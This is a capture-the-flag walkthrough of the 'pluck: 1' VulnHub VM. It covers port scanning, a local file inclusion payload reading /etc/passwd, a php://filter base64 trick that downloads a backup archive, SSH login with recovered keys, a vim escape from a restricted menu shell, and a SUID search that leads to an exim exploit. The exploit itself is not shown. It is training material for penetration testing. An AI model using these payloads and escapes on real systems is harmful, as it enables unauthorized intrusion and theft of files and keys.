pluck: 1 walk-through

In this post we will walk-through the pluck: 1 VM So let’s start !

Enumeration:

We will scan all TCP ports along with top UDP ports

root@kali:~/vulnhub/pluck# nmap -sS -p- -A --reason 192.168.17.153  \
> && nmap -sU -sV -A --top-ports 100 192.168.17.153 \
> && nmap -sU -p 161 192.168.17.153 \
> && nmap -sU -p 69 192.168.17.153 

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:32 +03
Nmap scan report for 192.168.17.153
Host is up, received arp-response (0.0010s latency).
Not shown: 65531 closed ports
Reason: 65531 resets
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA)
|_  256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA)
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pluck
3306/tcp open  mysql   syn-ack ttl 64 MySQL (unauthorized)
5355/tcp open  llmnr?  syn-ack ttl 1
MAC Address: 00:0C:29:1E:99:39 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.05 ms 192.168.17.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.03 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:34 +03
Nmap scan report for 192.168.17.153
Host is up (0.00061s latency).
Not shown: 98 closed ports
PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.17.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 204.24 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for 192.168.17.153
Host is up (0.00074s latency).
PORT    STATE  SERVICE
161/udp closed snmp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-24 11:37 +03
Nmap scan report for 192.168.17.153
Host is up (0.00056s latency).
PORT   STATE         SERVICE
69/udp open|filtered tftp
MAC Address: 00:0C:29:1E:99:39 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds

The website on port 80 is powered by PHP, I did try many PHP tricks to check for vulnerabilities and discovered that the site is prone to LFI and PHP base64-encode trick !

http://192.168.17.153/index.php?page=/etc/passwd

now we have a list of users:

  • bob
  • peter
  • paul
  • backup-user

Exploitation

I did try to brute-force , SQLi the admin login page but no luck.

Next I went back to the users list and tried to include the backup script mentioned in login shell of backup-user

http://192.168.17.153/index.php?page=/usr/local/scripts/backup.sh

We can try to include the tar file but this will be a total mess ! so let’s make a use of PHP base64-encode trick to download the file safely by encoding the data of backup.tar file then cut the HTML around it and decode it locally.

curl http://192.168.17.153/index.php?page=php://filter/convert.base64-encode/resource=/backups/backup.tar | grep 'jumbotron>' | cut -d '>' -f 2 | cut -d '<' -f 1 > backup.tar64
base64 -d backup.tar64 > backup.tar
mkdir backup ; tar -xvf backup.tar -C backup

After extracting the file We notice the existence of keys folder containing SSH keys of the user Paul, We will test the keys until we get a valid SSH login

ssh paul@192.168.17.153 -i id_key4

We are presented with shell login of menu type in this case Pdmenu, However We can escape this menu by selecting Edit file and type any file name to start using the vim.

:set shell=/bin/bash

Then type the following to jump on Bash

:shell

Privilege Escalation

I did try to escalate using Kernel exploits but no luck, However after searching for SUIDs We can notice the existence of exim agent.

paul@pluck:~$ find / -perm -u=s -type f 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g

I did try some exploits to escalate the privilege using exim agent but did not work for me, However I decided to give this exploit a shot since the difference in version is minimal and luckily this exploit works.

Flag:

 

 

 

 

 

 

 

and that’s it.

 

Leave a Reply

Your email address will not be published. Required fields are marked *